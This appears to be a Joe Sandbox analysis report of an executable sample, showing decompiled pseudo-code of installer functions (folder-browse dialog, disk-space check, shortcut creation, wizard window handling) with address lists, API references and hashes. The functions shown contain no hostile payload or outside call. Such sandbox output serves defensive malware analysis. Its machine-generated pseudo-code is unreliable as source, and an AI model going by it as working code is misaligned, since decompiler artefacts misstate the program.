				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































                                              0x004043f5
                                              0x004043fb
                                              0x00404401
                                              0x0040440e
                                              0x0040441c
                                              0x0040441f
                                              0x00404427
                                              0x0040442d
                                              0x0040442d
                                              0x00404439
                                              0x0040443c
                                              0x004044aa
                                              0x004044b1
                                              0x00404588
                                              0x0040458f
                                              0x0040459e
                                              0x0040459e
                                              0x004045a2
                                              0x004045ac
                                              0x004045b9
                                              0x004045bb
                                              0x004045bb
                                              0x004045c9
                                              0x004045d0
                                              0x004045d7
                                              0x004045da
                                              0x00404611
                                              0x00404613
                                              0x00404619
                                              0x0040461e
                                              0x00404622
                                              0x00404624
                                              0x00404624
                                              0x00404640
                                              0x00000000
                                              0x00404642
                                              0x00404645
                                              0x00404653
                                              0x00404659
                                              0x0040465a
                                              0x0040465d
                                              0x00404660
                                              0x00000000
                                              0x00404660
                                              0x004045dc
                                              0x004045de
                                              0x004045e2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004045e4
                                              0x004045e4
                                              0x004045f1
                                              0x004045f6
                                              0x00000000
                                              0x00000000
                                              0x004045fa
                                              0x004045fc
                                              0x004045fc
                                              0x00404607
                                              0x0040460a
                                              0x0040460f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040460f
                                              0x0040466c
                                              0x00404676
                                              0x00404679
                                              0x0040467c
                                              0x00404683
                                              0x00404683
                                              0x00404685
                                              0x00404685
                                              0x0040468a
                                              0x0040468c
                                              0x00404694
                                              0x0040469b
                                              0x0040469d
                                              0x004046a8
                                              0x004046a8
                                              0x0040469d
                                              0x004046b8
                                              0x004046c2
                                              0x004046ca
                                              0x004046e5
                                              0x004046cc
                                              0x004046d5
                                              0x004046d5
                                              0x004046ca
                                              0x004046ea
                                              0x004046ef
                                              0x004046f4
                                              0x004046fd
                                              0x004046fd
                                              0x00404706
                                              0x00404708
                                              0x00404708
                                              0x00404714
                                              0x0040471c
                                              0x00404726
                                              0x00404726
                                              0x0040472b
                                              0x00000000
                                              0x0040472b
                                              0x004045da
                                              0x00404591
                                              0x00404598
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00404598
                                              0x004044b7
                                              0x004044c0
                                              0x004044da
                                              0x004044df
                                              0x004044e9
                                              0x004044f0
                                              0x004044fc
                                              0x004044ff
                                              0x00404502
                                              0x00404509
                                              0x00404511
                                              0x00404514
                                              0x00404518
                                              0x0040451f
                                              0x00404527
                                              0x00404581
                                              0x00404529
                                              0x0040452a
                                              0x00404531
                                              0x0040453b
                                              0x00404543
                                              0x00404550
                                              0x00404564
                                              0x00404568
                                              0x00404568
                                              0x00404564
                                              0x0040456d
                                              0x0040457a
                                              0x0040457a
                                              0x00404527
                                              0x00000000
                                              0x004044df
                                              0x004044cd
                                              0x00000000
                                              0x00000000
                                              0x004044d3
                                              0x00000000
                                              0x0040443e
                                              0x0040444b
                                              0x00404454
                                              0x00404461
                                              0x00404461
                                              0x00404468
                                              0x0040446e
                                              0x00404477
                                              0x0040447a
                                              0x0040447d
                                              0x00404485
                                              0x00404488
                                              0x0040448b
                                              0x00404491
                                              0x00404498
                                              0x0040449f
                                              0x00404731
                                              0x00404743
                                              0x004044a5
                                              0x004044a8
                                              0x00000000
                                              0x004044a8
                                              0x0040449f

                                              APIs
                                              • GetDlgItem.USER32 ref: 00404444
                                              • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                                              • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                                              • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                                              • lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
                                              • lstrcatA.KERNEL32(?,00422F20), ref: 00404568
                                              • SetDlgItemTextA.USER32 ref: 0040457A
                                                • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                                                • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\qHpeBvr9cR.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\qHpeBvr9cR.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                              • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                                                • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                                                • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: /B$A$C:\Users\user\AppData\Local\Temp
                                              • API String ID: 2624150263-3312331311
                                              • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                              • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                                              • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                              • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                              0x0040203f
                                              0x00402049
                                              0x00402052
                                              0x0040205c
                                              0x00402065
                                              0x0040206f
                                              0x00402073
                                              0x00402073
                                              0x00402078
                                              0x00402089
                                              0x00402091
                                              0x00402171
                                              0x00402171
                                              0x00402178
                                              0x00402097
                                              0x00402097
                                              0x004020a8
                                              0x004020ac
                                              0x004020b2
                                              0x004020bc
                                              0x004020be
                                              0x004020c9
                                              0x004020cc
                                              0x004020d9
                                              0x004020db
                                              0x004020dd
                                              0x004020e4
                                              0x004020e7
                                              0x004020e7
                                              0x004020ea
                                              0x004020f4
                                              0x004020fc
                                              0x00402101
                                              0x0040210d
                                              0x0040210d
                                              0x00402110
                                              0x00402119
                                              0x0040211c
                                              0x00402125
                                              0x0040212a
                                              0x0040213c
                                              0x0040214b
                                              0x0040214d
                                              0x00402159
                                              0x00402159
                                              0x0040214b
                                              0x0040215b
                                              0x00402161
                                              0x00402161
                                              0x00402164
                                              0x0040216a
                                              0x0040216f
                                              0x00402184
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040216f
                                              0x0040217a
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: ByteCharCreateInstanceMultiWide
                                              • String ID: C:\Users\user\AppData\Local\Temp
                                              • API String ID: 123533781-1943935188
                                              • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                              • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                                              • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                              • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 39%
                                              			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                              0x0040266c
                                              0x00402680
                                              0x0040268b
                                              0x0040268c
                                              0x004027c7
                                              0x0040266e
                                              0x0040266e
                                              0x00402670
                                              0x00402672
                                              0x00402672
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                              • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                                              • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                              • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403AE4 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4;
							if(_t39 ==  *0x423fa4) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133;
							if( *0x42374c != _t133) {
								break;
							}
							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, 0x423780);
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133;
									if( *0x42374c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c;
						return 0 |  *0x42374c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0 &&  *0x423758 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421580 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                              0x00403aed
                                              0x00403af6
                                              0x00403c37
                                              0x00403c3b
                                              0x00403c3f
                                              0x00403c41
                                              0x00403c46
                                              0x00403c51
                                              0x00403c5c
                                              0x00403c61
                                              0x00403c63
                                              0x00403c65
                                              0x00403c68
                                              0x00403c6d
                                              0x00403c7b
                                              0x00403c88
                                              0x00403c8f
                                              0x00403c8f
                                              0x00403c90
                                              0x00403c90
                                              0x00403c95
                                              0x00403c9b
                                              0x00403ca2
                                              0x00403ca8
                                              0x00403caa
                                              0x00403cea
                                              0x00403cef
                                              0x00403cf4
                                              0x00403cf4
                                              0x00403cf9
                                              0x00403d02
                                              0x00403d04
                                              0x00403d09
                                              0x00403d0f
                                              0x00403d13
                                              0x00403d13
                                              0x00403d18
                                              0x00403d1e
                                              0x00000000
                                              0x00000000
                                              0x00403d29
                                              0x00403d2f
                                              0x00000000
                                              0x00000000
                                              0x00403d38
                                              0x00403d40
                                              0x00403d45
                                              0x00403d48
